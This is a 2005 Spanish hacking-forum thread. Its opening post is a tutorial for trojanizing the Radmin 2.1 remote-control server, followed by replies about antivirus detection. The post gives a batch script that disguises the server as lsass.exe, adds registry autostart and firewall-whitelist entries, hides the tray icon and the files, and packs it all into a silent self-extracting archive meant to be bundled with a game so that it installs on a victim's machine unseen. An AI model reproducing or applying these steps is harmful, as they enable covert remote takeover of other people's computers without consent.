elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 17:17  


Tema destacado: Nueva página de elhacker.net en Google+ Google+

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  actualizacion de troyanizando radmin
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: actualizacion de troyanizando radmin  (Leído 14,048 veces)
octalh


Desconectado Desconectado

Mensajes: 519


"El sueño de la razón produce monstruos"


Ver Perfil WWW
actualizacion de troyanizando radmin
« en: 23 Septiembre 2005, 22:03 »



ACTUALIZACION TROYANIZANDO RADMIN 2.1

By Octalh


Bueno antes que nada saludos a toda la gente del foro, ya tenia tiempo que no me pasaba por aqui... esque e andado algo desorientado pero bueno...

Debido a que en mi tutorial de troyanizando radmin se explica un metodo para empaquetarlo con una herramienta que ya es detectada por los AV me decidi a escribir esta actualizacion donde explicare otro metodo para empaquetarlo y que es 100 % indetectable a los av 

seria bueno que algun moderador editara este post y lo ponga en el otro post donde esta el tutorial de esa forma queda junto y no se pierde el hilo

bueno vamos a usar solamente una herramienta y lo mejor es que probablemente muchos ya la tienen instalada, ademas usare un metodo que descubri para brincarnos el FW del XP pero sin desactivarlo ya que si detenias el servicio a nuestra victima le salia un letrerito advirtiendole de su seguridad.. aaaa y ademas haremos que nuestro radmin no pueda ser cerrado desde el administrador de tareas 

ok si ya estan todos listos empezamos este tutorial

lo primero sera bajarnos en caso de que no lo tengan un programa que sirve para empaquetar archivos en .rar se llama WINRAR pues lo vamos a usar como joiner.

nos vamos a crear una carpeta y dentro de ella meteremos el server de radmin junto con su dll asi no hacemos desorden


r_server.exe


AdmDll.dll

bueno ahora renombramos el server de radmin por uno de estos nombres:

lsass.exe
winlogon.exe
smss.exe
csrss.exe
services.exe


la razon es porque estos son procesos del sistema criticos y por lo tanto no podran ser cerrados, esto se debe a que el administrador de tareas solo se fija en el nombre del proceso pero no de la ubicacion de este. Para mas informacion acerca de este bug click aqui http://lympex.sosvulnerable.net/resources/advisories/bug_proc_taskmgr.htm

despues le cambiaremos el icono por el del archivo original  quedando de la siguiente forma:

lsass.exe
  <===== r_server.exe

para cambiar el icono usaremos reshacker es una herramienta indispensable que ya todos deben tener.

ok con esto ya no podran cerrarlo desde el administrador de tareas, si lo intentan este sera el resultado



bien ya que esta renombrado y con nuevo icono procederemos a crearnos un bat, este como siempre agregara las llaves en el registro y ademas hara que el radmin pase el fw del xp sin tener que desactivarlo.

codigo del bat

Código:
@echo off
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993" /f
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000" /f
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lsass /t REG_SZ /d "%windir%\lsass.exe" /f

REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v C:\WINDOWS\lsass.exe /t REG_SZ /d "C:\WINDOWS\lsass.exe:*:Enabled:lsass" /f

attrib +h +s c:/windows/bin.bat
attrib +h +s c:/windows/lsass.exe

exit

si se fijan en el registro en la siguiente clave

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

encontraran todas las aplicaciones y puertos que el fw tiene con permisos, lo que estamos haciendo es agregar nuestro radmin a la lista de las aplicaciones que estan permitidas para darles salida  ;D

tambien añade atributos de archivo del sistema y oculto de esa forma no se pueden ver, ni con la opcion de mostrar archivos y carpetas ocultos, tienen que tener activada la otra opcion de mostrar archivos ocultos del sistema

el nombre del bat puede ser el que ustedes quieran yo le puse al mio bin.bat

bien ya que tenemos todo listo en nuestra carpeta procederemos empaquetarlo  ::)

Se supone para este punto ya todos deben tener instalado WINRAR y si no es asi pues instalalo rapido porque ya es hora de darle uso

seleccionaremos los 3 archivos que tenemos

lsass.exe
AdmDll.dll
bin.bat


le daremos boton derecho del mouse, y le daremos en la opcion

Add to archive...

una ves en el menu vamos a palomear la opcion

Create SFX archive



ahora nos vamos a la pestaña avanced y le damos click al boton SFX options

ahora en donde dice patch to extract escribiremos

Código:
c:\windows

y en run after extraction el nombre del bat en mi caso
Código:
bin.bat



ahora nos dirigimos a la pestaña Modes y palomeamos

Hide all
Overwrite all files


de esta forma extrae todo de forma oculta y ademas en caso de que ya exsitan esos archivos los sobreescribe

ahora ya le dan en aceptar y esperan a que el winrar cree el .exe

pues bien ahora ya tienen el radmin empaquetado y con un doble click se instalara en el sistema de la victima, pueden empaquetarlo junto con un juego, un programa o una animacion en flash de esa forma mientras ven la animacion radmin es instalado en el sistema  ;D y estara listo para usarse hasta el proximo reinicio.

Bien aqui termino este tutorial espero les guste, puedes distribuirlo siempre y cuando respetes las fuentes y no modifiques el texto.

Salu2 y suerte  ;D

www.codeprojecteam.com
En línea

「エステバン 」
ReCoLeCtAr DaToS eS SoLo El PriMeR pASo A la SaBiDuRIa
PeRo CoMpArTiR DaToS eS eL pRiMeR pAsO a La CoMuNidAD...

http://www.octalh.mx.gs/




http://www.aztekmindz.org

carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: actualizacion de troyanizando radmin
« Respuesta #1 en: 23 Septiembre 2005, 22:12 »

ojala funcione!!!!
Ahora mismo voy a probarlo y comento que tal me ha ido ;)

Saludos
En línea
carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: actualizacion de troyanizando radmin
« Respuesta #2 en: 23 Septiembre 2005, 22:35 »

acabo de probarlo con migo mismo, no me va. :(
En línea
octalh


Desconectado Desconectado

Mensajes: 519


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #3 en: 23 Septiembre 2005, 22:44 »

Algo haces mal yo lo probe en windows XP con SP2 y funciono perfectamente revisa el bat alomejor y no esta bien hecho recuerda que el foro corta el codigo para que quepa aa y ademas revisa que tengas la versión 2.1 de radmin ya que la 2.2 es diferente
« Última modificación: 23 Septiembre 2005, 22:47 por octalh » En línea

「エステバン 」
ReCoLeCtAr DaToS eS SoLo El PriMeR pASo A la SaBiDuRIa
PeRo CoMpArTiR DaToS eS eL pRiMeR pAsO a La CoMuNidAD...

http://www.octalh.mx.gs/




http://www.aztekmindz.org

SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #4 en: 23 Septiembre 2005, 22:47 »

nsoe que pasa con mi windows pero el reshacker no se ven bien los caracteres... que puede ser?
En línea

Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #5 en: 23 Septiembre 2005, 23:11 »

Detectado por VirusScan.... es obvio, si buscas en google sobre admdll.dll veras que ya todos lo conocen como remote-admin.
En línea

Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
katanaia

Desconectado Desconectado

Mensajes: 51



Ver Perfil
Re: actualizacion de troyanizando radmin
« Respuesta #6 en: 24 Septiembre 2005, 01:16 »

Todo muy bonito pero el NOD32 lo detecta de una. Asi que lo de 100% indetectable es cualquiera.
En línea

SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #7 en: 24 Septiembre 2005, 01:54 »

yo creo que todos los antivirus lo detectan la verdad.... mas que nada por el admdll.dll
En línea

Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
_R€d_


Desconectado Desconectado

Mensajes: 1.350



Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #8 en: 24 Septiembre 2005, 02:33 »

Citar
bueno ahora renombramos el server de radmin por uno de estos nombres:

lsass.exe
winlogon.exe
smss.exe
csrss.exe
services.exe

la razon es porque estos son procesos del sistema criticos y por lo tanto no podran ser cerrados, esto se debe a que el administrador de tareas solo se fija en el nombre del proceso pero no de la ubicacion de este. Para mas informacion acerca de este bug click aqui

Interesante; no me habia enterado muy bien de eso; pero lo tengo claro...lo del firewall del xp es una lastime que no este protegida bajo el registro...Saludos.
En línea

octalh


Desconectado Desconectado

Mensajes: 519


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #9 en: 24 Septiembre 2005, 02:35 »

mm que mala suerte, yo uso kav y no lo detecta. lo del indetectable lo dije por el joiner que usaba....

por lo del nod solo me preocupo por su heuristica de ahí en fuera se pueden modificar las firmas..
« Última modificación: 24 Septiembre 2005, 02:40 por octalh » En línea

「エステバン 」
ReCoLeCtAr DaToS eS SoLo El PriMeR pASo A la SaBiDuRIa
PeRo CoMpArTiR DaToS eS eL pRiMeR pAsO a La CoMuNidAD...

http://www.octalh.mx.gs/




http://www.aztekmindz.org

SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #10 en: 24 Septiembre 2005, 02:44 »

entonces está mas que claro que te debes cambiar de antivirus, o quizas actualizarlo.
En línea

Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
octalh


Desconectado Desconectado

Mensajes: 519


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #11 en: 24 Septiembre 2005, 02:51 »

ok lo tomare en cuenta aunque en si el post no trata sobre antivirus eso esta fuera de contexto , si quieres puedes hacer lo mismo con VNC o cualquier otro...  mas que una guia paso a paso es un texto para ampliar conocimientos y usar tu imaginacion...
En línea

「エステバン 」
ReCoLeCtAr DaToS eS SoLo El PriMeR pASo A la SaBiDuRIa
PeRo CoMpArTiR DaToS eS eL pRiMeR pAsO a La CoMuNidAD...

http://www.octalh.mx.gs/




http://www.aztekmindz.org

SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #12 en: 24 Septiembre 2005, 04:13 »

de todas maneras el texto está bueno en ese contexto y felicitaciones men y gracias por el trabajo que te diste.
En línea

Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
_R€d_


Desconectado Desconectado

Mensajes: 1.350



Ver Perfil WWW
Re: actualizacion de troyanizando radmin
« Respuesta #13 en: 24 Septiembre 2005, 06:38 »

SeniorX que mal agradecido eres xDDDDD

Pues hablando de antivirus; los detectan solo los mejores; para mi el mejor: Nod32...0:)
En línea

ibiza-tdi

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Ayudar con el Radmin 2.1 Troyanizado...
« Respuesta #14 en: 7 Noviembre 2005, 21:02 »

K onda;
Soy novato en esto...je...Y tengo un problema con el tuto...de donde  obtengo el archivo "AdmDll.dll" ??...No lo encuentro por ninguna parte...Espero k me puedan ayudar...

Saludos
Ibiza-Tdi... 8)
En línea

CoMpEtItIoN RuNs In OuR GeNeS AnD ThE HuNt FoR a MaTe HaS AlWaYs BeEn ThE UltImAtE FoRm Of CoMpEtItIoN
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines